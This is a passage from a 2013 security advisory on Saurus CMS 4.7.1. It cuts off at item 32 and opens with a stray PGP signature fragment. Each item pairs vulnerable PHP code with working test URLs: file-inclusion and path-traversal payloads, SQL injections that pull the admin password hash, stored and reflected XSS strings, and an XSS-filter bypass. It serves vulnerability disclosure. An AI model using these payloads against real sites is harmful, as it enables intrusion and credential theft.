iQEcBAEBAgAGBQJR48qZAAoJENQ4kG3hg80AJMEH/Rdyx2zmDPzr2Ar5Nc+Fw1ih aiby28PhIKfXhAst2SrkIp6ogtDEj+PBrgbEy2YJlyKi01z1Uf2UGukxijlQTg7H 0zYivz55vleBrr9OD/A2pxo7sZZy7eswH5jia5abRUVXYYqEVWYp5KWvzbMPO3CY EgLYxE4uv00ojqHCl9QsD7oa+mR52Jur3QZ/IdCbJJZgmEKmwNJvJ8rb6RvTMcae +8dWhC8bhfL3UkTW5snYZ4K/euA84LmGvcfd1PXrMAX01xXDdnPJ/JxrzSPLfb1x 6WyZO6cZpgxQqvogemXKOy2MmnNkWlkK0P9OmmDpBQBI66WnyBUxXNFxEr/HFKo= =6yIl -----END PGP SIGNATURE-----
  14. Description : Saurus CMS version 4.7.1 suffers from cross site scripting, remote file inclusion, local file inclusion, information disclosure, remote SQL injection, HTTP response splitting, cross site request forgery, and directory traversal vulnerabilities. Author : Janek Vind aka waraxe Source : Saurus CMS 4.7.1 4.7.1 LFI / RFI / XSS / SQL Injection / Traversal / CSRF ? Packet Storm Code : Author: Janek Vind "waraxe" Date: 14. July 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-106.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Web publishing system combining daily content management features with site administration and development tools. http://www.saurus.info/ Vulnerable was version 4.7.1 before 07. June 2013, older versions not tested: http://www.saurus.info/version-history/ ############################################################################### 1. Local File Inclusion in "admin/fckeditor_dialog_image.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameter "dialog" Preconditions: 1. Logged in as Saurus CMS user 2. At least one valid file ID must be known (can be bruteforced) Php script "admin/fckeditor_dialog_image.php" line 101: ------------------------[ source code start ]---------------------------------- $object = new Objekt(array( 'objekt_id' => (int)$site->fdat['file_id'], 'on_sisu' => 1, )); .. include_once('../js/fckeditor/editor/'.$site->fdat['dialog']); ------------------------[ source code end ]------------------------------------ Test (parameter "file_id" must be valid): http://localhost/saurus471/admin/fckeditor_dialog_image.php?file_id=10572&dialog=../../../.htaccess Result: contents of ".htaccess" file from Saurus CMS root directory will be revealed, LFI confirmed. ############################################################################### 2. Local File Inclusion in "extensions/saurus4/captcha_image.php" ############################################################################### Reason: 1. uninitialized variable "$captcha" Attack vector: 1. user-supplied parameter "captcha" Preconditions: 1. PHP setting "register_globals = on" Php script "extensions/saurus4/captcha_image.php" line 45: ------------------------[ source code start ]---------------------------------- switch ($captcha['image_type']) { case 'gif': include_once($class_path.'lgpl/GotchaGIF.class.php'); $img = new GotchaGIF($captcha['image_width'], $captcha['image_height']); break; .. if($img->create()) { //apply effects foreach($captcha['effects'] as $effect) { $effect_name = $effect['name']; //echo $effect_name; include_once($class_path.'lgpl/'.$effect_name.'.class.php'); ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/extensions/saurus4/captcha_image.php? captcha[image_type]=gif&captcha[image_width]=50&captcha[image_height]=50& captcha[effects][0][name]=../waraxe Result: Warning: include_once(../../classes/lgpl/../waraxe.class.php) [function.include-once]: failed to open stream: No such file or directory in C:\apache_www\saurus471\extensions\saurus4\captcha_image.php on line 73 PHP error message above confirms LFI vulnerability. ############################################################################### 3. Local File Inclusion in "admin/edit.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameter "extension_path" Preconditions: 1. Logged in as Saurus CMS user Php script "admin/edit.php" line 76: ------------------------[ source code start ]---------------------------------- if($site->fdat['extension_path']) { $actions_file = '..'.$site->fdat['extension_path'].'/actions.inc.php'; .. if (file_exists($actions_file)){ include_once($actions_file); ------------------------[ source code end ]------------------------------------ ############################################################################### 4. Remote File Inclusion in "map.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied GET parameter "cmd" Preconditions: 1. Windows server Php script "map.php" line 56: ------------------------[ source code start ]---------------------------------- $tmp_cmd=explode("/",$_GET['cmd']); .. foreach($tmp_cmd as $t){ // if the there is a .php in the URL then don't use aliases go directly to that file if(preg_match('/\.php$/i', $t) && file_exists($t) && !preg_match("#^\.\./#", $t)) .. include($t); ------------------------[ source code end ]------------------------------------ On *nix servers this code above is secure enough, but things change in case of Windows server - attacker is able to use backslashes, which leads to RFI. Example attack using local file: http://localhost/saurus471/map.php?cmd=..\..\..\..\test.php Example attack using remote file: http://localhost/saurus471/map.php?cmd=\\192.168.1.25\test.php ############################################################################### 5. Remote File Inclusion in "admin/change_config.php" ############################################################################### Reason: 1. uninitialized variable "$class_path" Attack vector: 1. user-supplied parameter "class_path" Preconditions: 1. PHP setting "register_globals = on" Php script "admin/change_config.php" line 25: ------------------------[ source code start ]---------------------------------- global $class_path; .. if(!isset($class_path)) { $class_path = "../classes/"; } .. include_once($class_path."port.inc.php"); ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/change_config.php?class_path=http://php.net/? ############################################################################### 6. Remote File Inclusion in "admin/repair_database.php" ############################################################################### Reason: 1. uninitialized variable "$class_path" Attack vector: 1. user-supplied parameter "class_path" Preconditions: 1. PHP setting "register_globals = on" Php script "admin/repair_database.php" line 23: ------------------------[ source code start ]---------------------------------- global $class_path; if(!isset($class_path)) { $class_path = "../classes/"; } include_once($class_path."port.inc.php"); ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/repair_database.php?class_path=http://php.net/? ############################################################################### 7. Remote File Inclusion in "admin/check_adminpage.php" ############################################################################### Reason: 1. uninitialized variable "$class_path" Attack vector: 1. user-supplied parameter "class_path" Preconditions: 1. PHP setting "register_globals = on" Php script "admin/check_adminpage.php" line 29: ------------------------[ source code start ]---------------------------------- if(!isset($class_path)) { $class_path = "../classes/"; } include($class_path."port.inc.php"); ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/check_adminpage.php?class_path=http://php.net/? ############################################################################### 8. SQL Injection in "index.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied GET parameter "pg" Preconditions: 1. PHP setting "magic_quotes_gpc = Off" Php script "index.php" line 303: ------------------------[ source code start ]---------------------------------- if ($CMS_SETTINGS['switch_lang_enabled'] && !$cache_data && !$_GET['lang'] && !$_GET['keel'] && (is_numeric($_GET['id']) || is_numeric($_GET['pg']))){ $myid = $_GET['id'] ? $_GET['id'] : $_GET['pg']; $sql = "SELECT keel.extension FROM objekt LEFT JOIN keel ON keel.keel_id=objekt.keel WHERE objekt_id='".$myid."'"; $sth = new SQL($sql); $mykeel = $sth->fetchsingle(); ------------------------[ source code end ]------------------------------------ As seen above, user-submitted GET parameters "id" and "pg" are checked to be numeric before using them in SQL query. If we analyze source code more closely, then it appears to be not as secure as planned by programmer. Attacker can input GET parameter "id" with value of "0" and GET parameter "pg" with SQL injection string containing single quote. As parameter "id" is numeric, checking code will be bypassed. Next line of code tests parameter "id" and because it is zero, variable "$myid" will get value from parameter "pg". This leads to SQL Injection. Test 1: http://localhost/saurus471/?speed_debug=on&id=0&pg=123 Result: "Page was generated in 1.20000 seconds.", normal server response. Test 2: http://localhost/saurus471/?speed_debug=on&id=0&pg='+UNION+SELECT+SLEEP(5)%23 Result: "Page was generated in 6.17751 seconds.", delay observed, SQL Injection confirmed. ############################################################################### 9. SQL Injection in "classes/sapi/function.init_search_results.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameter "sites" Preconditions: none Php script "classes/sapi/function.init_search_results.php" line 27: ------------------------[ source code start ]---------------------------------- function smarty_function_init_search_results($params,&$smarty) { .. if(!isset($sites)) $sites = $site->fdat['sites']; .. $pre_search_explode=explode(",",strtolower(trim($sites))); foreach($pre_search_explode as $k=>$v){ $pre_search_explode[$k]=trim($v); } $sql_keel = "SELECT keel_id FROM keel WHERE on_kasutusel=1 AND extension IN ('".implode("','",$pre_search_explode)."')"; .. $sth = new SQL($sql_keel); while($r = $sth->fetch("ASSOC")){ $keeled[]=$r['keel_id']; ------------------------[ source code end ]------------------------------------ As seen above, user-submitted parameter "sites" ends up used in SQL query without proper sanitization, which leads to SQL Injection vulnerability. Test 1: http://localhost/saurus471/index.php?op=search&speed_debug=on&sites=waraxe Result: "Page was generated in 1.18560 seconds.", normal server response. Test 2: http://localhost/saurus471/index.php?op=search&speed_debug=on&sites=')UNION+SELECT+SLEEP(5)%23 Result: "Page was generated in 6.22651 seconds.", delay observed, SQL Injection confirmed. ############################################################################### 10. SQL Injection in "admin/error_log.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameters "algus", "lopp", "err_type", "sortby" and "sort" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/error_log.php" line 63: ------------------------[ source code start ]---------------------------------- $algus_aeg = $site->fdat['algus']? $site->fdat['algus'] : date("d.m.Y",$start_d); $lopp_aeg = $site->fdat['lopp']? $site->fdat['lopp'] : date("d.m.Y"); .. if ($algus_aeg) { $where_sql[] = " error_log.time_of_error>='".$site->db->ee_MySQL($algus_aeg)." 00:00' "; } if ($lopp_aeg) { $where_sql[] = " error_log.time_of_error<='".$site->db->ee_MySQL($lopp_aeg)." 23:59' "; } if ($site->fdat['err_type']) { $where_sql[] = " error_log.err_type = '".$site->fdat['err_type']."' "; } .. $where_str = sizeof($where_sql)>0 ? " WHERE ".join(" AND ",$where_sql) : ''; .. $site->fdat['sortby'] = $site->fdat['sortby'] ? $site->fdat['sortby'] : 'time_of_error'; $site->fdat['sort'] = $site->fdat['sort'] ? $site->fdat['sort'] : 'DESC'; .. if($site->fdat['sortby']){ $order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort']; } .. $sql = $site->db->prepare("SELECT DATE_FORMAT(time_of_error,'%d.%m.%y %T') AS time_of_errorf, error_log.*"); $sql .= $from_sql; $sql .= $where_str; $sql .= $order; $sql .= $pagenumbers['limit_sql']; .. $sth = new SQL($sql); .. while ( $log = $sth->fetch() ) { ------------------------[ source code end ]------------------------------------ Test 1: http://localhost/saurus471/admin/error_log.php?err_type='UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23 http://localhost/saurus471/admin/error_log.php?algus=aa-'UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23 http://localhost/saurus471/admin/error_log.php?lopp=aa-'+AND+0+UNION+SELECT+1,1,1,1,@@version,1,1,1,1,1,1%23 Result: MySQL version info will be revealed Test 2: http://localhost/saurus471/admin/error_log.php?err_type='UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23 http://localhost/saurus471/admin/error_log.php?algus=aa-'UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23 http://localhost/saurus471/admin/error_log.php?lopp=aa-'+AND+0+UNION+SELECT+1,1,1,1,CONCAT_WS(0x3a,username,password),1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23 Result: Username and password hash of the Saurus CMS user with ID 1 will be revealed ############################################################################### 11. SQL Injection in "admin/extensions.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameters "sortby" and "sort" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/extensions.php" line 297: ------------------------[ source code start ]---------------------------------- $site->fdat['sortby'] = $site->fdat['sortby'] ? $site->fdat['sortby'] : 'name'; $site->fdat['sort'] = $site->fdat['sort'] ? $site->fdat['sort'] : 'ASC'; .. if($site->fdat['sortby']){ $order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort']; } .. $sql = $site->db->prepare("SELECT DATE_FORMAT(version_date,'%d.%m.%Y') AS fversion_date, extensions.*"); $sql .= $from_sql; $sql .= $order; .. $sth = new SQL($sql); .. while ( $ext = $sth->fetch() ) { ------------------------[ source code end ]------------------------------------ Test 1: http://localhost/saurus471/admin/extensions.php?sortby=1 Result: normal server response, no additional delay. Test 2: http://localhost/saurus471/admin/extensions.php?sortby=SLEEP(5)%23 Result: additionial delay observed, SQL Injection confirmed. ############################################################################### 12. SQL Injection in "admin/profile_data.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameters "sortby" and "sort" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/profile_data.php" line 521: ------------------------[ source code start ]---------------------------------- if($site->fdat['sortby']){ $order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort']; } .. $sql .= $from_sql; $sql .= $where; $sql .= $order; $sql .= $pagenumbers['limit_sql']; $sth = new SQL($sql); .. if($sth->rows){ .. while($asset = $sth->fetch()){ ------------------------[ source code end ]------------------------------------ ############################################################################### 13. SQL Injection in "classes/user_html.inc.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameters "sortby" and "sort" Preconditions: 1. logged in as Saurus CMS admin Php script "classes/user_html.inc.php" line 313: ------------------------[ source code start ]---------------------------------- $order = " ORDER BY ".$site->fdat['sortby']." ".$site->fdat['sort']; .. $sql = $site->db->prepare("SELECT users.* FROM users "); $sql .= $join; $sql .= $where; $sql .= $order; $sql .= $pagenumbers['limit_sql']; .. $sth = new SQL($sql); .. while($tmp = $sth->fetch()){ ------------------------[ source code end ]------------------------------------ ############################################################################### 14. SQL Injection in "admin/sys_sonad_loetelu.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameter "sst_id" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/sys_sonad_loetelu.php" line 123: ------------------------[ source code start ]---------------------------------- $sst_id = ($site->fdat['sst_id'] ? $site->fdat['sst_id'] : $glossary_word_types[0]['sst_id']); if(is_numeric($site->fdat['flt_keel'])) { .. $otsi = $otsi ? " (sys_sonad_kirjeldus.sona LIKE '%".$otsi."%' OR sys_sonad.sona LIKE '%".$otsi."%' OR sys_sonad.origin_sona LIKE '%".$otsi."%' OR sys_sonad.sys_sona LIKE '%".$otsi."%' OR sys_sonad_kirjeldus.sys_sona LIKE '%".$otsi."%') " : " sys_sonad.sst_id=".$sst_id; $where_str = $site->db->prepare(" WHERE sys_sonad.keel=? AND ".$otsi." ", $keel_id, 1 ); .. $sql .= $where_str; .. $sth = new SQL($sql); .. while ( $mysona = $sth->fetch('ASSOC') ) { $words[] = $mysona; } ------------------------[ source code end ]------------------------------------ Test 1: http://localhost/saurus471/admin/sys_sonad_loetelu.php?flt_keel=1&sst_id=0+UNION+SELECT+@@version,1,1,1,1,1,1,1%23 Result: MySQL version info will be revealed Test 2: http://localhost/saurus471/admin/sys_sonad_loetelu.php?flt_keel=1&sst_id=0+UNION+SELECT+CONCAT_WS(0x3a,username,password),1,1,1,1,1,1,1+FROM+users+WHERE+user_id=1%23 Result: Username and password hash of the Saurus CMS user with ID 1 will be revealed ############################################################################### 15. SQL Injection in "admin/change_config.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameter "timezone" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/change_config.php" line 153: ------------------------[ source code start ]---------------------------------- $q="update config set sisu='".$site->fdat['timezone']."' where nimi='time_zone'"; new SQL($q); ------------------------[ source code end ]------------------------------------ ############################################################################### 16. Stored XSS in "admin/log.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameter "user" Preconditions: 1. 1. "Enable site log" enabled (it is by default) Php script "classes/site.class.php" line 538: ------------------------[ source code start ]---------------------------------- if($this->fdat["op"] == 'login' && $this->fdat["url"] && $this->CONF['disable_form_based_login'] != "1") { $this->user = new User(array( user => $this->fdat["user"], pass => $this->fdat["pass"], "site" => &$this, )); $user_id = $this->user->user_id; if ($user_id) { .. else { # kirjuta logi new Log(array( 'action' => 'log in', 'component' => 'Users', 'type' => 'NOTICE', 'message' => "Unauthorized access to CMS: username '".$this->fdat["user"]."', IP: '".$_SERVER["REMOTE_ADDR"]."'", )); ------------------------[ source code end ]------------------------------------ As seen above, in case of failed login attempt site log entry will be created, containing various information, including submitted username. Php script "admin/log.php" line 265: ------------------------[ source code start ]---------------------------------- <?php foreach ($log_records as $log_record) { //printr($log_record); ?> .. <td><?=$log_record['message'];?></td> ------------------------[ source code end ]------------------------------------ We can see, that php script "admin/log.php", used by admins for sitelog view, does not implement proper encoding or escaping of output, leading to Stored XSS vulenrability. Because this specific XSS payload can be inserted by anonymous user, but target victim is admin, then it has serious security impact and can lead to site full compromise. Possible attack scenario: 1. Stored XSS insertion, 2. admin opens log.php, XSS payload steals CSRF token, 3. CSRF attack, new admin account creation, 4. attacker logs in as new admin, game over ... Test: 1. Issue GET request as below: http://localhost/saurus471/admin/?op=login&url=1&user=<script>alert(123);</script> 2. Log in as Saurus CMS admin and open site log page: http://localhost/saurus471/admin/log.php Result: javascript alert box pops up, confirming Stored XSS vulnerability. ############################################################################### 17. Stored XSS in "admin/error_log.php" ############################################################################### Reason: 1. improper encoding or escaping of output Preconditions: 1. "Save PHP and MySQL errors into the database" enabled (it is by default) Php script "classes/port.inc.php" line 150: ------------------------[ source code start ]---------------------------------- function saurusErrorHandler($errno, $errmsg, $filename, $linenum, $vars){ .. if (!defined("SAVE_ERROR_LOG")){ $res = @mysql_query("SELECT sisu FROM config WHERE nimi='save_error_log'"); if ($res){ list($tmp) = @mysql_fetch_array($res); } define("SAVE_ERROR_LOG", ($tmp ? 1:0)); } if (SAVE_ERROR_LOG && !substr_count($errmsg, 'mysql_num_fields')){ @mysql_query("INSERT INTO error_log (time_of_error, source, err_text, err_type, domain, referrer, fdat_scope, ip, remote_user) VALUES (NOW(), '".addslashes($filename." line ".$linenum)."', '".addslashes($errmsg)."', 'PHP', '".addslashes($_SERVER['HTTP_HOST'])."', '".addslashes($_SERVER['REQUEST_URI'])."', '".addslashes($serialized_fdat). "', '".$_SERVER['REMOTE_ADDR']."', '".addslashes($_SERVER['REMOTE_USER'])."')"); } } } # Redefine error handler $old_error_handler = set_error_handler("saurusErrorHandler"); ------------------------[ source code end ]------------------------------------ As seen above, new PHP error handler is defined, which writes all PHP error messages to error log in database. Php script "admin/error_log.php" line 320: ------------------------[ source code start ]---------------------------------- <td width="60%"><?= $log['err_text'] ?></td> ------------------------[ source code end ]------------------------------------ We can see, that php script "admin/log.php", used by admins for error log view, does not implement proper encoding or escaping of output, leading to Stored XSS vulenrability. Because this specific XSS payload can be inserted by anonymous user, but target victim is admin, then it has serious security impact and can lead to site full compromise by similar scenario as described in previous case. Test: 1. Issue GET request as below (MySQL Injection from one of the previous cases): http://localhost/saurus471/?id=0&pg='<script>alert(123);</script> 2. Log in as Saurus CMS admin and open erro log page: http://localhost/saurus471/admin/error_log.php Result: javascript alert box pops up, confirming Stored XSS vulnerability. ############################################################################### 18. XSS protection bypass in "classes/port.inc.php" ############################################################################### Php script "classes/port.inc.php" line 536: ------------------------[ source code start ]---------------------------------- if(strstr($_SERVER['REQUEST_URI'], $CMS_SETTINGS['wwwroot'].'/admin/') === false && ( detect_xss_in_saurus_params($_SERVER['QUERY_STRING']) || detect_xss_in_saurus_params($_SERVER['REQUEST_URI']) || detect_xss_in_string($_SERVER['PHP_SELF']) || detect_xss_in_saurus_params($_POST) || detect_xss_in_saurus_params($_GET)) ) { header('Location: '.$CMS_SETTINGS['wwwroot'].'/index.php'); exit; } ------------------------[ source code end ]------------------------------------ We can see, that XSS detection functions are used against various input parameters and in case of positive hit redirection to home page follows. There is custom exclusion in place for administrative scripts and it's implementation is not secure enough - attacker can use "$CMS_SETTINGS['wwwroot'].'/admin/'" string in URI and XSS detection will be bypassed. String for XSS detection bypass is "/saurus471/admin/" in examples below. Test 1: http://localhost/saurus471/kalender.php?month=<script> Result: XSS detected, redirection follows Test 2: http://localhost/saurus471/kalender.php?/saurus471/admin/&month=<script> Result: XSS not detected, no redirection ############################################################################### 19. Reflected XSS in "kalender.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameters "form", "vorm", "form_field", "lahter" and "month" Preconditions: none Php script "kalender.php" line 50: ------------------------[ source code start ]---------------------------------- <script type="text/javascript"> //<!-- // Handle click of OK link function handleOK(selected_date) { if (opener && !opener.closed) { opener.document.<?if(isset($site->fdat['form'])){echo $site->fdat['form'];} else{ echo $site->fdat['vorm'];}?>. <?if(isset($site->fdat['form_field'])){echo $site->fdat['form_field'];} else{ echo $site->fdat['lahter'];}?>.value=selected_date; opener.document.<?if(isset($site->fdat['form'])){echo $site->fdat['form'];} else{ echo $site->fdat['vorm'];}?>. <?if(isset($site->fdat['form_field'])){echo $site->fdat['form_field'];} else{ echo $site->fdat['lahter'];}?>.focus(); .. if($site->fdat['month']>=1&&$site->fdat['month']<=12) { $month = $site->fdat['month']; .. defaultDate: new Date(<?=$year;?>, <?=$month;?> - 1, <?=$day;?>), ------------------------[ source code end ]------------------------------------ Tests: http://localhost/saurus471/kalender.php?form=</script><script>alert(123);</script> http://localhost/saurus471/kalender.php?vorm=</script><script>alert(123);</script> http://localhost/saurus471/kalender.php?form_field=</script><script>alert(123);</script> http://localhost/saurus471/kalender.php?lahter=</script><script>alert(123);</script> http://localhost/saurus471/kalender.php?/saurus471/admin/&month=1</script><script>alert(123);</script> Results: javascript alert boxes pop up, confirming Reflected XSS vulnerabilities. ############################################################################### 20. Reflected XSS in "editor/kalender.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameters "form", "vorm", "form_field", "lahter" and "month" Preconditions: 1. must be logged in as user Php script "editor/kalender.php" line 50: ------------------------[ source code start ]---------------------------------- <script type="text/javascript"> //<!-- // Handle click of OK link function handleOK(selected_date) { if (opener && !opener.closed) { opener.document.<?if(isset($site->fdat['form'])){echo $site->fdat['form'];} else{ echo $site->fdat['vorm'];}?>. <?if(isset($site->fdat['form_field'])){echo $site->fdat['form_field'];} else{ echo $site->fdat['lahter'];}?>.value=selected_date; opener.document.<?if(isset($site->fdat['form'])){echo $site->fdat['form'];} else{ echo $site->fdat['vorm'];}?>. <?if(isset($site->fdat['form_field'])){echo $site->fdat['form_field'];} else{ echo $site->fdat['lahter'];}?>.focus(); .. if($site->fdat['month']>=1&&$site->fdat['month']<=12) { $month = $site->fdat['month']; .. defaultDate: new Date(<?=$year;?>, <?=$month;?> - 1, <?=$day;?>), ------------------------[ source code end ]------------------------------------ Tests: http://localhost/saurus471/editor/kalender.php?form=</script><script>alert(123);</script> http://localhost/saurus471/editor/kalender.php?vorm=</script><script>alert(123);</script> http://localhost/saurus471/editor/kalender.php?form_field=</script><script>alert(123);</script> http://localhost/saurus471/editor/kalender.php?lahter=</script><script>alert(123);</script> http://localhost/saurus471/editor/kalender.php?/saurus471/admin/&month=1</script><script>alert(123);</script> Results: javascript alert boxes pop up, confirming Reflected XSS vulnerabilities. ############################################################################### 21. Reflected XSS in "admin/delete_log.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameter "tbl" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/delete_log.php" line 176: ------------------------[ source code start ]---------------------------------- <input type="hidden" name="tbl" value="<?=$site->fdat['tbl']?>"> ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/delete_log.php?tbl="><script>alert(123);</script> Result: javascript alert box pops up, confirming Reflected XSS vulnerability. ############################################################################### 22. Reflected XSS in "admin/edit_adminpage.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameters "id" and "op" Preconditions: 1. logged in as Saurus CMS admin Tests: http://localhost/saurus471/admin/edit_adminpage.php?id="><script>alert(123);</script> http://localhost/saurus471/admin/edit_adminpage.php?op="><script>alert(123);</script> Results: javascript alert boxes pop up, confirming Reflected XSS vulnerabilities. ############################################################################### 23. Reflected XSS in "admin/edit_group.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameter "group_id" Preconditions: 1. logged in as Saurus CMS admin Tests: http://localhost/saurus471/admin/edit_group.php?op=edit&group_id=1"><script>alert(123);</script> Result: javascript alert boxes pop up, confirming Reflected XSS vulnerabilities. ############################################################################### 24. Reflected XSS in "admin/profile_data.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameter "profile_id" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/profile_data.php" line 65: ------------------------[ source code start ]---------------------------------- print "<font color=red><b>Profile '".$site->fdat['profile_id']."' not found!</b></font>"; ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/profile_data.php?profile_id=<script>alert(123);</script> Result: javascript alert box pops up, confirming Reflected XSS vulnerability. ############################################################################### 25. Reflected XSS in "admin/edit_object.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameter "profile_id" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/edit_object.php" line 101: ------------------------[ source code start ]---------------------------------- print "<font color=red><b>Profile '".$profile_id."' not found!</b></font>"; ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/edit.php?tab=object&op=new&&tyyp_id=20&profile_id=,<script>alert(123);</script> Result: javascript alert box pops up, confirming Reflected XSS vulnerability. ############################################################################### 26. Reflected XSS in "admin/edit_profile.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameter "pid" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/edit_profile.php" line 997: ------------------------[ source code start ]---------------------------------- print "<font color=red><b>Profile '".$site->fdat['pid']."' not found!</b></font>"; ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/edit_profile.php?op=edit&did=1&pid=<script>alert(123);</script> Result: javascript alert box pops up, confirming Reflected XSS vulnerability. ############################################################################### 27. Reflected XSS in "admin/profiles.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameters "profile_id", "source_table", "did" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/profiles.php" line 247: ------------------------[ source code start ]---------------------------------- <TD class="scms_dropdown_item"><a href="javascript:void(openpopup ('edit_profile.php?op=newdef&pid=<?= $site->fdat['profile_id'] ?> .. <TD class="scms_dropdown_item"><a href="javascript:void(openpopup ('edit_profile.php?op=new&pid=<?= $site->fdat['profile_id']?> &source_table=<?= $site->fdat['source_table']?> .. <TD nowrap><?if($site->fdat['profile_id']){?><a href="javascript:void(openpopup ('edit_profile.php?op=edit&pid=<?= $site->fdat['profile_id']?> &did=<?= $site->fdat['did']?>' .. <TD><?if($site->fdat['profile_id']){?><a href="javascript:void(openpopup ('edit_profile.php?op=delete&pid=<?= $site->fdat['profile_id']?> .. <TD><?if($site->fdat['profile_id']){?><a href="javascript:void(openpopup ('edit_profile.php?op=duplicate&pid=<?= $site->fdat['profile_id']?> &did=<?=$site->fdat['did']?>' .. <TD><a href="<?= $site->self ?>?profile_id=<?= $site->fdat['profile_id']?>&op=sync" ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/profiles.php?profile_id="><script>alert(123);</script> http://localhost/saurus471/admin/profiles.php?source_table="><script>alert(123);</script> http://localhost/saurus471/admin/profiles.php?profile_id=z&did="><script>alert(123);</script> Results: javascript alert boxes popping up, confirming Reflected XSS vulnerability. ############################################################################### 28. Reflected XSS in "admin/sys_alias.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameters "flt_keel" and "keel_id" Preconditions: 1. logged in as Saurus CMS admin Test: http://localhost/saurus471/admin/sys_alias.php?flt_keel="><script>alert(123);</script> http://localhost/saurus471/admin/sys_alias.php?keel_id="><script>alert(123);</script> Result: javascript alert boxes popping up, confirming Reflected XSS vulnerability. ############################################################################### 29. Reflected XSS in "admin/sys_sonad_loetelu.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameters "flt_keel" Preconditions: 1. logged in as Saurus CMS admin Test: http://localhost/saurus471/admin/sys_sonad_loetelu.php?flt_keel=</script><script>alert(123);</script> Result: javascript alert box pops up, confirming Reflected XSS vulnerability. ############################################################################### 30. Reflected XSS in "admin/user_management.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. all user-supplied parameters (excluding "selected_devices") Preconditions: 1. logged in as Saurus CMS admin Php script "admin/user_management.php" line 138: ------------------------[ source code start ]---------------------------------- foreach($site->fdat as $fdat_field=>$fdat_value) { if($fdat_field != 'selected_devices'){ echo '<input type=hidden id="selectform_'.$fdat_field.'" name="'.$fdat_field.'" value="'.$fdat_value.'">'; } ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/user_management.php?foobar="><script>alert(123);</script> Result: javascript alert box pops up, confirming Reflected XSS vulnerability. ############################################################################### 31. Reflected XSS in "admin/permissions.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameters "selected_group", "user_id", "group_id" and "role_id" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/permissions.php" line 229: ------------------------[ source code start ]---------------------------------- <input type=hidden id="selectform_selected_group" name="selected_group" value="<?=$site->fdat['selected_group']?>"> <input type=hidden id="selectform_user_id" name="user_id" value="<?=$site->fdat['user_id']?>"> <input type=hidden id="selectform_group_id" name="group_id" value="<?=$site->fdat['group_id']?>"> ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/permissions.php?selected_group="><script>alert(123);</script> http://localhost/saurus471/admin/permissions.php?user_id="><script>alert(123);</script> http://localhost/saurus471/admin/permissions.php?group_id="><script>alert(123);</script> http://localhost/saurus471/admin/permissions.php?role_id="><script>alert(123);</script> Result: javascript alert boxes popping up, confirming Reflected XSS vulnerability. ############################################################################### 32. Reflected XSS in "admin/file_source.php" 